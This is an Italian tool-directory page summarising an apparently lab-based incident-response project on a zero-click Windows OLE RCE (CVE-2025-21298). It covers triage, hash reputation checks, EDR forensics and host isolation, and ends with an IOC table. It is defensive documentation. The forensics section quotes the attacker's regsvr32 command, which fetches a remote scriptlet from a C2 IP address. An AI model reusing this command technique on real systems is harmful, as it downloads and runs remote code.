Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Zero-Click-RCE-Incident-Response-CVE-2025-21298 — Indagine tecnica e contenimento dell'host di un exploit RCE zero-click di gravità critica (CVE-2025-21298) utilizzando telemetria EDR e analisi statica del malware. | Kitploit
Strumenti/GitHubGitHub/tarunbharathe/zero-click-rce-incident-response-cve-2025-21298
Gestione degli Indicatori di Compromissione (IOC)Analisi delle VulnerabilitàAnalisi MalwareDigital ForensicsCommand and ControlThreat IntelligenceApprendimento e FormazioneRisposta agli IncidentiLab e Pratica

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHubtarunbharathe/zero-click-rce-incident-response-cve-2025-21298

Zero-Click-RCE-Incident-Response-CVE-2025-21298

Indagine tecnica e contenimento dell'host di un exploit RCE zero-click di gravità critica (CVE-2025-21298) utilizzando telemetria EDR e analisi statica del malware.

Vedi Repository
4 mesi faNon ancora revisionato

Incident Response: RCE Zero-Click OLE di Windows (CVE-2025-21298)

Panoramica del Progetto

Questo progetto documenta l'indagine e il contenimento end-to-end di un tentativo di Esecuzione Remota di Codice (RCE) Zero-Click di gravità critica. Utilizzando la telemetria EDR e la threat intelligence, ho identificato un attacco "Living off the Land" (LotL) che ha bypassato le difese automatizzate e ha stabilito una comunicazione command-and-control (C2).

Obiettivi Chiave

  • Eseguire il triage degli avvisi SIEM ad alta priorità per exploit Zero-Day.
  • Eseguire analisi statica sugli allegati RTF armamentizzati.
  • Condurre indagini forensi sugli endpoint per identificare alberi di processi dannosi.
  • Eseguire l'isolamento di rete tramite EDR per contenere le minacce attive.

Esecuzione del Ciclo di Vita dell'Incidente (NIST SP 800-61)

1. Rilevamento e Triage Iniziale

Ho identificato l'Event ID 314: Rilevamento RCE Zero-Click OLE di Windows. La telemetria iniziale ha rivelato che il file dannoso mail.rtf è stato Consentito dalle difese perimetrali, indicando una compromissione attiva sulla workstation 'Austin'.

Avviso Iniziale

2. Analisi Statica e Threat Intelligence

Ho effettuato un controllo della reputazione dell'hash del file su VirusTotal. I risultati hanno confermato un tasso di rilevamento di 25/55, identificando specificamente il file come un RTF armamentizzato che utilizza CVE-2025-21298. Questa vulnerabilità consente l'esecuzione remota di codice tramite il riquadro di anteprima di Windows senza interazione da parte dell'utente.

Analisi Statica

3. Forensics dell'Endpoint (Caccia al Payload)

Mi sono spostato sulla cronologia del terminale EDR per l'host 'Austin' per identificare il comportamento post-exploitation. Ho scoperto un'esecuzione dannosa "Living off the Land" (LotL):

  • Comando: regsvr32.exe /s /u /i:http://84.38.130.118/...
  • Approfondimento dell'Analista: L'attaccante ha utilizzato un binario Windows firmato (regsvr32.exe) per recuperare uno script-let dannoso da un server remoto, bypassando le liste di applicazioni consentite standard e le firme AV tradizionali.

Log dell'Endpoint Dettagli dell'Infrastruttura C2

4. Contenimento e Neutralizzazione

Seguendo il NIST Incident Response Framework, è stata data priorità al contenimento immediato. Ho eseguito un Isolamento di Rete sull'host interessato per terminare la comunicazione C2 e prevenire il movimento laterale all'interno della rete aziendale.

Azione di Contenimento

5. Risoluzione e Report Finale

L'incidente è stato chiuso come vero positivo. Ho documentato l'IP dell'attaccante (84.38.130.118) e le prove forensi per i team Threat Intelligence e Firewall per prevenire occorrenze future.

Risoluzione Finale


Indicatori di Compromissione (IOC)

Lezioni Chiave

  • Difesa in Profondità: gli exploit zero-click dimostrano perché l'AV basato su firme è insufficiente per le minacce moderne.
  • Correlazione dei Log: correlazione riuscita dei dati degli avvisi SIEM con i log del terminale EDR per confermare lo sfruttamento attivo.
  • Competenza EDR: esercitato un rapido contenimento dell'host per minimizzare il "dwell time" dell'attaccante.
Scarica lo strumento
TipoValore
Indirizzo IP C284.38.130.118
Hash del File (SHA256)df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184
VulnerabilitàCVE-2025-21298
MITRE ATT&CKT1218.010 - Signed Binary Proxy Execution: Regsvr32